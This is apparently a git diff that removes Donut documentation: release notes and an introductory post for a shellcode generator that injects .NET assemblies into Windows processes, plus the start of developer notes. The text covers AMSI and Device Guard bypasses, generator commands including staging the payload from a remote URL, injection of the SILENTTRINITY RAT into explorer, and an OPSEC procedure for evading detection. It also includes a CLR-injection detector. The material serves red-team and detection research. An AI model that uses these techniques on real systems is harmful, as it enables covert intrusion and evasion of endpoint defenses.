2) ```eax``` will be decremented, resulting in an underflow.
3) Since the sign flag is set from the underflow, the condition for the jump is satisfied. Jump to the x86 shellcode.
If the process is x64:
1) ```eax``` will be nulled.
2) ```0x48``` is an REX prefix for the next instruction
3) The previous REX prefix is not valid for the ```js``` instruction. As such, nothing happens.
4) Since the x64 PIC is immediately following the previous instruction in memory, ```eip``` is now pointing at the first instruction in the x64 PIC. It now executes.
Starting in the v0.9.1 "Apple Fritter" release, dual-mode shellcode is the default. You may still tell Donut to produce x86 or x64 shellcode, rather than AMD64+x86.
Naturally, the dual-mode PIC will be larger than the other options. If the size of the PIC matters, use the version for the particular process you are targeting. Or, have your injector check the architecture of the target process before injecting into it. If not, use the dual-mode version to ensure maximum compatbility with host processes.
## Auto-Detect CLR Version
Rather than require the user to specify the CLR version, we now read the headers of the .NET Assembly to determine the appropriate CLR version.
The .NET Assembly file format is an extension of the regular [PE Format](https://en.wikipedia.org/wiki/Portable_Executable) used by Windows executables. One of the optional fields used by .NET is the ```IMAGE_COR20_HEADER```, which references a ```STORAGESIGNATURE``` structure containing the version details necessary to load the correct runtime. We check the ```iVersionString``` variable to get the exact version requirement for your Assembly. Please note, the names of these data structures and variables are somewhat arbitrary. I am borrowing [dnSpy's](https://github.com/0xd4d/dnSpy) terminology so that I can show you these two pretty pictures.
The relevant layout of the .NET headers in my SafetyKatz DLL as stored on disk:
![_config.yml]({{ site.baseurl }}/images/Apple_Fritter/headers_in_PE.PNG)
And what the ```STORAGESIGNATURE``` structure actually looks like:
![_config.yml]({{ site.baseurl }}/images/Apple_Fritter/structured_headers.PNG)
If you do not want us to automatically determine the version number, you may still manually specify what version to use with the `-r` flag.
## Main Entry Point
The original version of Donut did not handle Main entry points for EXEs well due to the fact that it uses an object array as its function signature rather than a string array. We now correctly handle this so that you don't have to know about the difference. :-)
## AMSI Patching
To provide some context, AMSI integration has been added to the new version of the .NET Framework. It has also been ported to [.NET Core](https://github.com/dotnet/coreclr/issues/21370).
Specifically, AMSI integration was added to the CLR itself so that any .NET Assemblies loaded from memory will be scanned with ```AmsiScanBuffer``` from ```amsi.dll``` before they are loaded. If the result of ```AmsiScanBuffer``` is anything but ```S_OK``` it will return an ```HRESULT``` error code. This affects everything that loads Assemblies from memory using the CLR, including ```System.Reflection.Assembly.Load```, Donut shellcode, and (presumably if I could test it) Cobalt Strike's ```execute-assembly``` command.
When you try to load a .NET Assembly from memory that is known to be malicious, you get a Defender alert that looks like the picture below. Notice that data source was AMSI, and that the process it was running in is ```notepad.exe```. The assembly was injected into notepad through Donut shellcode.
![_config.yml]({{ site.baseurl }}/images/Apple_Fritter/donut_AMSI.PNG)
However, their implementation of AMSII integration is subject to memory patching bypasses in the same way that PowerShell is. We developed on existing research, produced some custom bypasses, and added a modular bypass system to Donut that lets you choose which technique you would like to use.
Odzhan wrote a [blog post](https://modexp.wordpress.com/2019/06/03/disable-amsi-wldp-dotnet/) detailing each of the AMSI bypasses we added to Donut. It is important to note that there could be many more. I believe that anyone who sits down to do the research and develop an AMSI bypass will probably come up with their own slightly different variant. As long as Microsoft continues to rely on calling DLL functions from user-level memory space, AMSI will be subject to memory patching bypasses.
The result looks like the picture below. I safely injected SafetyKatz into ```notepad.exe``` using Donut shellcode, even thought AMSI was used. Defender shows no detections.
![_config.yml]({{ site.baseurl }}/images/Apple_Fritter/amsi_is_dead.PNG)
I must strongly emphasize, the fact that 4.8 AMSI can be bypassed like in PowerShell does NOT make it useless. This new AMSI is a *good thing* that will benefit .NET Security. It incurs cost upon adversaries. Use it. But also recognise that, like everything, it has its limitations.
### Modular Bypass System
As we researched bypasses for AMSI, it became clear that there is many ways to do it. It would be silly to force users of Donut to have to use whatever we came up with. As such, we ensured that you may easily add your own bypass or customize one of ours. The bypasses are defined in ```payload/bypass.c```. You may either modify our C code, or add your own. Each bypass implements the same ```BOOL DisableAMSI(PDONUT_INSTANCE inst)``` function and is wrapped in an ```#ifdef BYPASS_NAME``` preprocessor directive. To change which bypass is used, change the Makefile to define the bypass name specified by the directive.
For example, you could change the relevant line in ```payload/Makefile.msvc``` from
```
cl -DBYPASS_AMSI_A -DBYPASS_WLDP_A -Zp8 -c -nologo -Os -O1 -Gm- -GR- -EHa -Oi -GS- -I ..\include payload.c ..\hash.c ..\encrypt.c bypass.c clib.c
```
To:
```
cl -DBYPASS_AMSI_B -DBYPASS_WLDP_A -Zp8 -c -nologo -Os -O1 -Gm- -GR- -EHa -Oi -GS- -I ..\include payload.c ..\hash.c ..\encrypt.c bypass.c clib.c
```
In order to switch from using BypassA to BypassB.
This system not only makes it easy to change the bypass technique, but also reduces the size, complexity, and signaturability of the shellcode by ensuring that code you are not using is present in the PIC to be found by AV/EDR.
## Device Guard Dynamic Code Prevention Bypass
Windows Defender Device Guard includes an optional policy for disabling dynamically-generated .NET code from executing. Because it was mixed-in with the AMSI scanning code, we went ahead and disabled it too. Not sure if that will help anyone, but hey it was easy. ¯\_(ツ)_/¯
![_config.yml]({{ site.baseurl }}/images/Apple_Fritter/code_integrity.png)
# Conclusion
Donut v0.9.1 "Apple Fritter" represents the first improvements to Donut. More improvements are coming as we have time to make them. In the meantime, Donut is still in Beta so we welcome feedback and testing.
I know that several people have already had difficulties integrating Donut into their toolsets because of the complexity of the data structures it uses. To help with this, our plan for the full release (version 1.0) is to produce C# and Python generators. That will be the primary focus of our efforts moving forward.
## Plans
Below is the current version release plan for Donut.
* v0.9.1:
* Dual-Mode shellcode that can run in either x64 for x86 (WOW64) processes.
* Automatic detection of the CLR version required for .NET Assembly payloads.
* AMSI bypassing for version .NET 4.8 that ensure all Assemblies can be safely loaded.
* Modular system for adding bypasses. Your choide of bypass functionality is compiled into payload.exe based on compiler flags.
* Bypass for Device Guard policy preventing execution of dynamically generated .NET code
* Better handling of Main functions (Entry Points) that use an object array containing string arrays, rather than an array of strings
* v1.0:
* C# generator
* C# wrapper for our dynamic library
* Python generator
* Python wrapper for our dynamic library
* Better documentation for debugging, designing with, and integrating Donut.
* v1.1:
* Automatic unloading of Application Domains after the Assembly finishes executing.
* Support for HTTP proxies

336
docs/2019-5-9-Introducing-Donut.md
View File

@ -1,336 +0,0 @@
---
layout: post
title: Donut - Injecting .NET Assemblies as Shellcode
---
*TLDR: You can now inject .NET Assemblies into Windows processes using this repo: https://github.com/TheWover/donut/*
# Advancing Tradecraft - Context
Offensive and red team tradecraft have changed significantly in the past year. As anti-malware systems improve their capability to detect and deter offensive tools, attackers are shifting their focus to technologies that are not observed by AV. Currently, that means operating entirely in memory and avoiding dropping files onto disk. In the Windows world, the .NET Framework provides a convenient mechanism for this. It is, however, severely restricted in that .NET programs cannot be injected directly into remote processes. In this article, we will address this issue by describing how to inject .NET code into processes via shellcode.
## .NET Primer
Before we begin, you must understand a few important components of .NET.
<details>
<summary>Click to expand the primer!</summary>
* [Common Language Runtime](https://docs.microsoft.com/en-us/dotnet/standard/clr "Common Language Runtime"): Like Java, .NET uses a runtime environment (or "virtual machine") to interpret code at runtime. All .NET Code is compiled from an intermediate language to native code "Just-In-Time" before execution.
* [Common Intermediate Language](https://docs.microsoft.com/en-us/dotnet/standard/managed-code "Common Intermediate Language"): Speaking of an intermediate language, .NET uses CIL (also known as MSIL). All .NET languages (of which there are many) are "assembled" to this intermediate language. CIL is a generic object-oriented assembly language that can be interpreted into machine code for any hardware architecture. As such, the designers of .NET languages do not need to design their compilers around the architectures they will run on. Instead, they merely need to design it to compile to one language: CIL.
* [.NET Assemblies](https://docs.microsoft.com/en-us/dotnet/framework/app-domains/assemblies-in-the-common-language-runtime ".NET Assemblies"): .NET applications are packaged into .NET Assemblies. They are so called because the code from your language of choice has been "assembled" into CIL but not truly compiled. Assemblies use an extension of the PE format and are represented as either an EXE or a DLL that contains CIL rather than native machine code.
* [Application Domains](https://docs.microsoft.com/en-us/dotnet/framework/app-domains/application-domains "Application Domains"): Assemblies are run inside of a safe "box" known as an Application Domain. Multiple Assemblies can exist within an AppDomain, and multiple AppDomains can exist within a process. AppDomains are intended to provide the same level of isolation between executing Assemblies as is normally provided for processes. Threads may move between AppDomains and can share objects through marshalling and delegates.
</details>
## Current state of .NET Tradecraft
Currently, .NET tradecraft is limited to post-exploitation execution by one of two main ways:
* Assembly.Load(): The .NET Framework's standard library includes an API for [code reflection](https://en.wikipedia.org/wiki/Reflection_(computer_programming)). This Reflection API includes System.Reflection.Assembly.Load, which can be used to load .NET programs from memory. In less than five lines of code, you may load a .NET DLL or EXE from memory and execute it.
* execute-assembly: In Cobalt Strike 3.11, Raphael Mudge introduced a command called 'execute-assembly' that ran .NET Assemblies from memory as if they were run from disk. This command introduced the world to .NET tradecraft and signalled the shift to [Bringing Your Own Land](https://www.fireeye.com/blog/threat-research/2018/06/bring-your-own-land-novel-red-teaming-technique.html).
However, both execution vectors produce challenges for red teams seeking to develop flexible TTPs.
## Assembly.Load
While the Reflection API is very versatile and can be useful in many different ways, it can only run code in the current process. No support is provided for running payloads in remote processes.
## execute-assembly
The main problem with execute-assembly is that it executes the same way every time. That predictability ensures that it is reliable, but also lets defenders built analytics.
1. A subprocess is created using the *spawnto* executable. Mudge refers to this as a "sacrificial process" because it acts as a host for your payloads, isolating your Beacon's process from any failure in your code.
2. A reflective DLL is injected into the subprocess to load the .NET Runtime.
3. The reflective DLL loads an intermediate .NET Assembly to handle errors and improve the stability of your payload.
4. The intermediate .NET Assembly loads your .NET Assembly from memory inside the subprocess.
5. The main entry point of your Assembly is invoked along with your command-line arguments.
The result is that execute-assembly *does* allow you to inject your .NET Assembly into a remote process. However, it does not let you inject into a running process or specify how that injection occurs. It is only modular in *what* you can run, not *how* you can run it. The most that you can do is to specify what exceutable is run for your sacrificial subprocess by changing the *spawnto* variable in your Malleable C2 Profile. execute-assembly also has a hidden size limitation of 1 MB for your payloads, which limits your flexibility in designing post-exploitation tools.
## Moving Forward
To move past these limitations, we need a technique that meets the following requirements:
* Allows you to run .NET code from memory.
* Can work with any Windows process, regardless of its architecture and whether it has the CLR loaded.
* Allows you to inject that code in either a remote (different) process or the local (current) process.
* Allows you to determine in what way that injection occurs.
* Works with multiple types of process injection.
The most flexible type of payload that meets those requirements is shellcode. But you can't just convert a .NET Assembly to shellcode. They run through a runtime environment, not directly on the hardware. Wouldn't it be great if we could just inject .NET Assemblies as shellcode? Yes. Yes, it would.
# Introducing Donut
![_config.yml]({{ site.baseurl }}/images/Introducing_Donut/donut.png)
```Shortly before publishing donut, Odzhan and I became aware of another team working on a shellcode generator for .NET Assemblies. They were at the same stage of their project at us. We both agreed that whomever of us published first would ensure that the other received due credit for their work. As soon as they publish their tool, we will update this article with a link.```
Donut is a shellcode generation tool that creates x86 or x64 shellcode payloads from .NET Assemblies. This shellcode may be used to inject the Assembly into arbitrary Windows processes. Given an arbitrary .NET Assembly, parameters, and an entry point (such as Program.Main), it produces position-independent shellcode that loads it from memory. The .NET Assembly can either be staged from a URL or stageless by being embedded directly in the shellcode. Either way, the .NET Assembly is encrypted with the Chaskey block cipher and a 128-bit randomly generated key. After the Assembly is loaded through the CLR, the original reference is erased from memory to deter memory scanners. The Assembly is loaded into a new Application Domain to allow for running Assemblies in disposable AppDomains.
Donut is currently at version 0.9 (Beta). Please share any issues or suggestions with us as Issues on GitHub. Once we have received feedback, we will release version 1.0. A link to the compiled v0.9 release can be found [here](https://github.com/TheWover/donut "Release 0.9").
# How it Works
## Unmanaged Hosting API
Microsoft provides an API known as the [Unmanaged CLR Hosting API](https://docs.microsoft.com/en-us/dotnet/framework/unmanaged-api/hosting/). This API allows for unmanaged code (such as C or C++) to host, inspect, configure, and use Common Language Runtimes. It is a legitimate API that can be used for many purposes. Microsoft uses it for several of their products, and other companies use it to design custom loaders for their programs. It can be used to improve performance of .NET applications, create sandboxes, or just do wierd stuff. We do the latter.
One of the things it can do is manually load .NET Assemblies into arbitrary [Application Domains](https://docs.microsoft.com/en-us/dotnet/framework/app-domains/application-domains). It can do this either from disk or from memory. We utilize its capability for loading from memory to load your payload without touching disk.
To see a standalone example of an Unmanaged CLR Hosting Assembly loader, check out Casey Smith's repo: [AssemblyLoader](https://github.com/caseysmithrc/AssemblyLoader)
## CLR Injection
The first action that donut's shellcode takes is to load the CLR. Unless the user specifies the exact runtime version to use, v4.0.30319 of the CLR will be used by default, which supports the versions 4.0+ of .NET. If the attempt to load a specific version fails, then donut will attempt to use whichever one is avialable on the system. Once the CLR is loaded, the shellcode creates a new Application Domain. At this point, the .NET Assembly payload must be obtained. If the user provided a staging URL, then the Assembly is downloaded from it. Otherwise, it is obtained from memory. Either way, it will loaded into the new AppDomain. After the Assembly is loaded but before it is run, the decrypted copy will be released and later freed from memory with VirtualFree to deter memory scanners. Finally, the Entry Point specified by the user will be invoked along with any provided parameters.
If the CLR is already loaded into the host process, then donut's shellcode will still work. The .NET Assembly will just be loaded into a new Application Domain within the managed process. .NET is designed to allow for .NET Assemblies built for multiple versions of .NET to run simultaneously in the same process. As such, your payload should always run no matter the process's state before injection.
## Shellcode Generation
The logic above describes how the shellcode generated by donut works. That logic is defined in payload.exe. To get the shellcode, exe2h extracts the compiled machine code from the .text segment in payload.exe and saves it as a C array to a C header file. donut combines the shellcode with a Donut Instance (a configuration for the shellcode) and a Donut Module (a structure containing the .NET assembly, class name, method name and any parameters).
# Using Donut
Donut can be used as-is to generate shellcode from arbitrary .NET Assemblies. Both a Windows EXE and a Python (Python planned for v1.0) script are provided for payload generation. The command-line syntax is as described below.
```
usage: donut [options] -f <.NET assembly> -c <namespace.class> -m <Method>
-f <path> .NET assembly to embed in PIC and DLL.
-u <URL> HTTP server hosting the .NET assembly.
-c <namespace.class> The assembly class name.
-m <method> The assembly method name.
-p <arg1,arg2...> Optional parameters for method, separated by comma or semi-colon.
-a <arch> Target architecture : 1=x86, 2=amd64(default).
-r <version> CLR runtime version. v4.0.30319 is used by default.
-d <name> AppDomain name to create for assembly. Randomly generated by default.
examples:
donut -a 1 -c TestClass -m RunProcess -p notepad.exe -f loader.dll
donut -f loader.dll -c TestClass -m RunProcess -p notepad.exe -u http://remote_server.com/modules/
```
## Generating Shellcode
To generate shellcode with donut, you must specify a .NET Assembly, an Entry Point, and any parameters that you wish to use. If your Assembly uses the *Test* namespace and includes the *Program* class with the *Main* method, then you would use the following options:
```
donut.exe -f Test.exe -c Test.Program -m Main
```
To generate the same shellcode for 32-bit processes, use the '-a' option:
```
donut.exe -a 1 -f Test.exe -c Test.Program -m Main
```
You may also provide parameters to whatever Entry Point you specify. The max length of each parameter is currently 32 characters. To demonstrate this functionality, you may use the following options and our example Assembly to create shellcode that will spawn a Notepad process and a Calc process:
```
.\donut.exe -f .\DemoCreateProcess\bin\Release\DemoCreateProcess.dll -c TestClass -m RunProcess -p notepad.exe,calc.exe
```
When generating shellcode to run an an older Windows machine, you may need it to use v2 of the CLR, rather than v4. v2 works for versions of the .NET Framework <= 3.5, while v4 works for versions >= 4.0. By default, donut uses version 4 of the CLR. You may tell it to use v2 with the '-r' option and specifying "v2.0.50727" as the parameter.
```
.\donut.exe -r v2.0.50727 -f .\DemoCreateProcess\bin\Release\DemoCreateProcess.dll -c TestClass -m RunProcess -p notepad.exe,calc.exe
```
The name of the AppDomain for your .NET payload may be specified manually using the '-d' option. By default, it will be randomly generated. You may specify a name.
```
.\donut.exe -d ResourceDomain -r v2.0.50727 -f .\DemoCreateProcess\bin\Release\DemoCreateProcess.dll -c TestClass -m RunProcess -p notepad.exe,calc.exe
```
In order to reduce the size of your shellcode (or for many other reasons), you may specify a URL where your payload will be hosted. Donut will produce an encrypted Donut Module with a random name that you should place at the URI you specified. The name and location where you should place it will be printed to your screen when you generate the shellcode.
```
.\donut.exe -u http://remote_server.com/modules/ -d ResourceDomain -r v2.0.50727 -f .\DemoCreateProcess\bin\Release\DemoCreateProcess.dll -c TestClass -m RunProcess -p notepad.exe,calc.exe
```
## Demonstrating with SILENTTRINITY
For a demonstration, we will use the [SILENTTRINITY RAT](https://github.com/byt3bl33d3r/SILENTTRINITY "SILENTTRINITY") as a test payload. Since it is the most... ahh... complicated .NET Assembly that I could find, I used it for all of my testing. You may use any standard shellcode injection technique to inject the .NET Assembly. The DonutTest subproject is provided in the repo as an example injector. You may combine it with the DemoCreateProcess subproject to test the shellcode generator. In our case, we will first use DonutTest to inject into explorer. We also show what it looks like to use an existing implant to perform further injection using the ``` boo/shellcode ``` and ``` ipy/execute-assembly ``` post-exploitation modules.
### Generation
First, we will generate a x64 PIC using the SILENTTRINITY DLL. Using PowerShell, we will base64-encode the result and pipe it to our clipboard.
![_config.yml]({{ site.baseurl }}/images/Introducing_Donut/ST_generate_and_copy.png)
Because we don't know what processes will be available to inject into on-target, we will also generate a x86 PIC just in case we need it.
![_config.yml]({{ site.baseurl }}/images/Introducing_Donut/ST_generate_and_copy_86.png)
If you wanted to, you could use a staging server by providing the URL and copying the Donut Module to the specified location.
![_config.yml]({{ site.baseurl }}/images/Introducing_Donut/generate_URL.png)
### Choosing a Host Process
Use ProcessManager, a sub-project provided in the donut repo, to enumerate processes. ProcessManager enumerates all running processes and makes a best effort to obtain information about them. It is specifically designed to aid in determining what process to inject / migrate into. The picture below demonstrates its general usage.
![_config.yml]({{ site.baseurl }}/images/Introducing_Donut/ProcessManager.jpg)
### Injecting
First, we will use DonutTest to inject into explorer using DonutTest.
![_config.yml]({{ site.baseurl }}/images/Introducing_Donut/ST_inject.jpg)
As you can see, the injection was successfull:
![_config.yml]({{ site.baseurl }}/images/Introducing_Donut/ST_success.png)
Now assume we already have an agent running on the machine. We can use SILENTTRINITY's post-exploitation modules to inject implants into running processes.
![_config.yml]({{ site.baseurl }}/images/Introducing_Donut/ST_through_agent.png)
## Using as a Library
donut is provided as both dynamic and static libraries for both (*.a* / *.so*) and Windows (*.lib* / *.dll*). It has a simple API that is described in *docs\api.html*. Two exported functions are provided, ``` int DonutCreate(PDONUT_CONFIG c) ``` and ``` int DonutDelete(PDONUT_CONFIG c) ``` .
## Rebuilding the shellcode
You may easily customize our shellcode to fit your use case. *payload.c* contains the .NET assembly loader, which should successfully compile with both Microsoft Visual Studio and mingw-w64. Make files have been provided for both compilers which will generate x86-64 shellcode by default unless x86 is supplied as a label to nmake/make. Whenever *payload.c* has been changed, recompiling for all architectures is recommended before rebuilding donut.
### Microsoft Visual Studio
Open the x64 Microsoft Visual Studio build environment, switch to the *payload* directory, and type the following:
```
nmake clean -f Makefile.msvc
nmake -f Makefile.msvc
```
This should generate a 64-bit executable (*payload.exe*) from *payload.c*. exe2h will then extract the shellcode from the *.text* segment of the PE file and save it as a C array to *payload_exe_x64.h*. When donut is rebuilt, this new shellcode will be used for all payloads that it generates.
To generate 32-bit shellcode, open the x86 Microsoft Visual Studio build environment, switch to the payload directory, and type the following:
```
nmake clean -f Makefile.msvc
nmake x86 -f Makefile.msvc
```
This will save the shellcode as a C array to *payload_exe_x86.h*.
### Mingw-w64
Assuming you're on Linux and *mingw-w64* has been installed from packages or source, you may still rebuild the shellcode using our provided makefile. Change to the *payload* directory and type the following:
```
make clean -f Makefile.mingw
make -f Makefile.mingw
```
Once you've recompiled for all architectures, you may rebuild donut.
## Integrating into Tooling
We hope that donut (or something inspired by it) will be integrated into tooling to provide **inject** and **migrate** functionality. To do so, we suggest one of the following methods:
* As an operator, using the generator to manually generate shellcode.
* Generate the shellcode dynamically on your C2 server, pass that down to an existing implant, and inject it into another process.
* Use our dynamic or static libraries.
* As a template for building your own shellcode / generator.
* Use our Python (Python planned for v1.0) extension to script shellcode generation dynamically.
# Advancing Tradecraft
It is our hope that releasing donut to the public will advance offensive and red team tradecraft in several ways:
* Provide red teams and adversary emulators with a means to emulate this technique that threat actors may have developed in secret.
* Provide blue teams a frame of refernce for detecting and mitigating CLR Injection techniques.
* Inspire tool developers to develop new types of techniques and tradecraft.
## Alternative Payloads
The main benefit of using .NET Assemblies as shellcode is that they can now be executed by anything that can execute shellcode on Windows. There are many more ways to inject shellcode than there are to load Assemblies. As such, offensive tool designers no longer need to design their payloads around running .NET. Instead, they may leverage their existing payloads and techniques that use shellcode.
## Injecting .NET At Will / Migration
Donut will also allow the developers of C2 Frameworks / RATs to add migrate-like functionality to their tools. By using Donut as a library (or calling the generator) on the server and then providing the result to an existing agent, it may inject a new instance of itself into another running process. This may also be used to inject arbitrary post-exploitation modules so long as I/O is properly redirected.
## Disposable AppDomains
When donut loads an Assembly, it loads it into a new AppDomain. Unless the user specifies the name of the AppDomain with the '-d' parameter, the AppDomain is given a random name. We specifically designed donut to run payloads in new AppDomains rather than using DefaultDomain. If this does not suit you, you can easily modify payload.c to use the default domain. By running the payload in its own AppDomain, this allows for the development of tools that run post-exploitation modules in disposable AppDomains. Application Domains can be unloaded, but individual Assemblies cannot. Therefore, to unload an Assembly when you are done with it, you must put it into its own AppDomain and unload that instead. A C# agent can have the shellcode generated on its server, inject the result into itself in a new thread, wait for the Assembly to finish executing, then unload the host AppDomain. You could also modify the shellcode itself to perform that role.
## Detecting CLR Injection
One of the companion projects for donut is ModuleMonitor. It uses WMI Event Win32_ModuleLoadTrace to monitor for module loading. It provides filters, detailed data, and has an option to monitor for CLR Injection attacks.
The CLR Sentry option follows some simple logic: If a process loads the CLR, but the program is not a .NET program, then the CLR has been injected into it.
While useful, there are both false positives and false negatives:
* False Postiive: There are (few) legitimate uses of the Unmanaged CLR Hosting API. If there weren't, then Microsoft wouldn't have made it. CLR Sentry will notice every unmanaged program that loads the CLR.
* False Negatives: This will NOT notice injection of .NET code into processes that already have the CLR loaded. So, no use of the Reflection API and not when donut is used to inject shellcode into managed processes.
Please Note: This is intended **only** as a Proof-of-Concept to demonstrate the anomalous behavior produced by CLR injection and how it may be detected. It should not be used in any way in a production environment.
I am not a defender, but the following pseudocode is my attempt at an analytic that follows this logic. The DLLs that are associated with the CLR all start with "msco", such as "mscorlib.dll" and "mscoree.dll". As such, we watch for their loading, then check if the program that loaded them is a valid .NET Assembly.
```
void CLR_Injection:
WHEN Image_Load event:
if event.Module.Name contains "msco*.dll":
if !(IsValidAssembly(event.Process.FilePath)):
{
print "A CLR has been injected into " + event.Process.Id
}
```
The snippet below represents my implementation of this logic in C#. The full code can be found in ModuleMonitor.
```csharp
//CLR Sentry
//Author: TheWover
while (true)
{
//Get the module load.
Win32_ModuleLoadTrace trace = GetNextModuleLoad();
//Split the file path into parts delimited by a '\'
string[] parts = trace.FileName.Split('\\');
//Check whether it is a .NET Runtime DLL
if (parts[parts.Length - 1].Contains("msco"))
{
//Get a
Process proc = Process.GetProcessById((int) trace.ProcessID);
//Check if the file is a .NET Assembly
if (!IsValidAssembly(proc.StartInfo.FileName))
{
//If it is not, then the CLR has been injected.
Console.WriteLine();
Console.WriteLine("[!] CLR Injection has been detected!");
//Display information from the event
Console.WriteLine("[>] Process {0} has loaded the CLR but is not a .NET Assembly:", trace.ProcessID);
}
}
}
```
![_config.yml]({{ site.baseurl }}/images/Introducing_Donut/detected.png)
It is important to note that this behaviour represents all CLR Injection techniques, of which there are several. This detection should work for donut, as well as other tools such as Cobalt Strike's 'execute-assembly' command.
## OpSec Considerations
ModuleMonitor demonstrates an important point about CLR Injection: When performed against unmanaged processes, CLR Injection produces highly anomalous process behavior. The loading of a CLR after a process's initial execution or from unmanaged code is unusual. There are few legitimate use cases. From a defender's perspective, this allows you to build a analytics that monitor for the behavior described in the section above.
However, as I mentioned, this analytic fails to detect CLR Injection into processes that already have the CLR loaded. As such, an operator could evade the analytic by simply injecting into processes that are already managed. I would recommend the following standard operating procedure:
1. Run ProcessManager from memory to enumerate processes. Take note of which you can inject into.
2. If there are any processes that are already managed, then consider them the set of potential targets.
3. If there are not any managed processes, then all processes are potential targets.
4. Either way, inject / migrate into the process that is most likely to naturally produce network traffic and live the longest.
# Conclusion
Offensive .NET tradecraft is faced with several important challenges. One of them is the lack of means to inject into remote processes at will. While this can normally be performed with shellcode, there is no way to produce shellcode that can run a .NET Assembly directly on hardware. Any shellcode that runs a .NET Assembly must first bootstrap the Common Language Runtime and load the Assembly through it. Enter Donut. With Donut, we now have a framework for generating flexible shellcode that loads a .NET Assembly from memory. This can be combined with existing techniques and tooling to advance tradecraft in a number of ways. Hopefully, this will break down the current barriers in .NET-based exploitation and provide tool designers with a foundation for crafting more excellent tools.

912
docs/devnotes.md
View File

@ -1,912 +0,0 @@
<html>
<head>
<meta charset="utf-8">
</head>
<body>
<h2>Table of contents</h2>
<ol>
<li><a href="#intro">Introduction</a></li>
<li><a href="#api">Donut API</a></li>
<li><a href="#config">Donut Configuration</a></li>
<li><a href="#static">Static Example</a></li>
<li><a href="#dynamic">Dynamic Example</a></li>
<li><a href="#com">Donut Components</a></li>
<li><a href="#instance">Donut Instance</a></li>
<li><a href="#module">Donut Module</a></li>
<li><a href="#hashing">Win32 API Hashing</a></li>
<li><a href="#encryption">Symmetric Encryption</a></li>
<li><a href="#bypass">Bypasses for AMSI/WLDP</a></li>
<li><a href="#debug">Debugging The Generator and Loader</a></li>
<li><a href="#loader">Extending The Loader</a></li>
</ol>
<h2 id="intro">1. Introduction</h2>
<p>This document contains information useful to developers that want to integrate Donut into their own project or write their own generator in a different language. Static and dynamic examples in C are provided for Windows and Linux. There's also information about the internals of the generator and loader such as data structures, the hash algorithm for resolving API, how bypassing AMSI and WLDP works, the symmetric encryption, debugging the generator and loader. Finally, there's also some information on how to extend functionality of the loader itself.</p>
<h2 id="api">2. Donut API</h2>
<p>Shared/dynamic and static libraries for both Windows and Linux provide access to three API.</p>
<ol>
<li><code>int DonutCreate(PDONUT_CONFIG)</code></li>
<p>Builds the Donut shellcode/loader using settings stored in a <code>DONUT_CONFIG</code> structure.</p>
<li><code>int DonutDelete(PDONUT_CONFIG)</code></li>
<p>Releases any resources allocated by a successful call to <code>DonutCreate</code>.</p>
<li><code>const char* DonutError(int error)</code></li>
<p>Returns a description for an error code returned by <code>DonutCreate</code>.</p>
</ol>
<p>The Donut project already contains a generator in C. <a href="https://twitter.com/nixbyte">nixbyte</a> has written <a href="https://github.com/n1xbyte/donutCS">a generator in C#</a>. awgh has written <a href="https://github.com/Binject/go-donut/">a generator in Go</a> and <a href="https://twitter.com/byt3bl33d3r">byt3bl33d3r</a> has written a Python module already included with the source.</p>
<h2 id="config">3. Donut Configuration</h2>
<p>The minimum configuration required to build the loader is a path to a VBS/JS/EXE/DLL file that will be executed in-memory. If the file is a .NET DLL, a class and method are required. If the module will be stored on a HTTP server, a URL is required. The following structure is declared in donut.h and should be zero initialized prior to setting any member.</p>
<pre style='color:#000000;background:#ffffff;'><span style='color:#800000; font-weight:bold; '>typedef</span> <span style='color:#800000; font-weight:bold; '>struct</span> _DONUT_CONFIG <span style='color:#800080; '>{</span>
uint32_t len<span style='color:#808030; '>,</span> zlen<span style='color:#800080; '>;</span> <span style='color:#696969; '>// original length of input file and compressed length</span>
<span style='color:#696969; '>// general / misc options for loader</span>
<span style='color:#800000; font-weight:bold; '>int</span> arch<span style='color:#800080; '>;</span> <span style='color:#696969; '>// target architecture</span>
<span style='color:#800000; font-weight:bold; '>int</span> bypass<span style='color:#800080; '>;</span> <span style='color:#696969; '>// bypass option for AMSI/WDLP</span>
<span style='color:#800000; font-weight:bold; '>int</span> compress<span style='color:#800080; '>;</span> <span style='color:#696969; '>// engine to use when compressing file via RtlCompressBuffer</span>
<span style='color:#800000; font-weight:bold; '>int</span> entropy<span style='color:#800080; '>;</span> <span style='color:#696969; '>// entropy/encryption level</span>
<span style='color:#800000; font-weight:bold; '>int</span> format<span style='color:#800080; '>;</span> <span style='color:#696969; '>// output format for loader</span>
<span style='color:#800000; font-weight:bold; '>int</span> exit_opt<span style='color:#800080; '>;</span> <span style='color:#696969; '>// return to caller or invoke RtlExitUserProcess to terminate the host process</span>
<span style='color:#800000; font-weight:bold; '>int</span> thread<span style='color:#800080; '>;</span> <span style='color:#696969; '>// run entrypoint of unmanaged EXE as a thread. attempts to intercept calls to exit-related API</span>
uint32_t oep<span style='color:#800080; '>;</span> <span style='color:#696969; '>// original entrypoint of target host file</span>
<span style='color:#696969; '>// files in/out</span>
<span style='color:#800000; font-weight:bold; '>char</span> input<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of input file to read and load in-memory</span>
<span style='color:#800000; font-weight:bold; '>char</span> output<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of output file to save loader</span>
<span style='color:#696969; '>// .NET stuff</span>
<span style='color:#800000; font-weight:bold; '>char</span> runtime<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// runtime version to use for CLR</span>
<span style='color:#800000; font-weight:bold; '>char</span> domain<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of domain to create for .NET DLL/EXE</span>
<span style='color:#800000; font-weight:bold; '>char</span> cls<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of class with optional namespace for .NET DLL</span>
<span style='color:#800000; font-weight:bold; '>char</span> method<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of method or DLL function to invoke for .NET DLL and unmanaged DLL</span>
<span style='color:#696969; '>// command line for DLL/EXE</span>
